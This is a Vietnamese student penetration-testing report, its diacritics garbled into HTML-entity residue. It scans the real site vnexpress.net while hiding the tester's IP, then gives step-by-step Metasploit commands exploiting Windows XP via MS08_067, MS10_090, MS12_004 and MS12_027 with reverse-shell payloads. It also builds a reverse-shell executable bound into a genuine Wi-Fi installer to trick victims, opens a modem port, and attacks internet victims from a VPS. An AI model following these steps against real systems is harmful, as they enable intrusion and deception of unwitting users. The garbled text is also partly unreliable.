- Ngagravey 0311 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms08_067
bằng Metasploit( httpswwwyoutubecomwatchv=m3M33vEqg4s)
- Ngagravey 0511 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms10_090
bằng Metasploit( httpswwwyoutubecomwatchv=fUygw4tjDOI)
- Ngagravey 0811 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_004
bằng Metasploit( httpswwwyoutubecomwatchv=hPmPqKC2zaM)
- Ngagravey 1111 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_027
bằng Metasploit( httpswwwyoutubecomwatchv=BDVLpPF_NOg)
- Ngagravey 2511 Tigravem hiểu về VPS Honeypot
- Ngagravey 2911 Cagravei đặt Metasploit trecircn VPS Xacircm nhập windows 8 từ VPS
(Cagravei đặt httpswwwyoutubecomwatchv=pkEn79kQ4CI)
(Xacircm nhập windows 8 httpswwwyoutubecomwatchv=0DtgzfdPl8A)
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN
221 Tổng quan về BackTrack
2211 Giới thiệu Backtrack
Backtrack lagrave một hệ điều hagravenh phaacutet triển trecircn nhacircn Linux đồng thời cũng lagrave bộ sưu tập caacutec
cocircng cụ kiểm tra đaacutenh giaacute mức độ an ninh của hệ thống mạng một caacutech toagraven diện Backtrack
trở thagravenh một cocircng cụ khocircng thể thiếu với những ai muốn tigravem hiểu nghiecircn cứu vagrave khaacutem phaacute
thế giới bảo mật
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
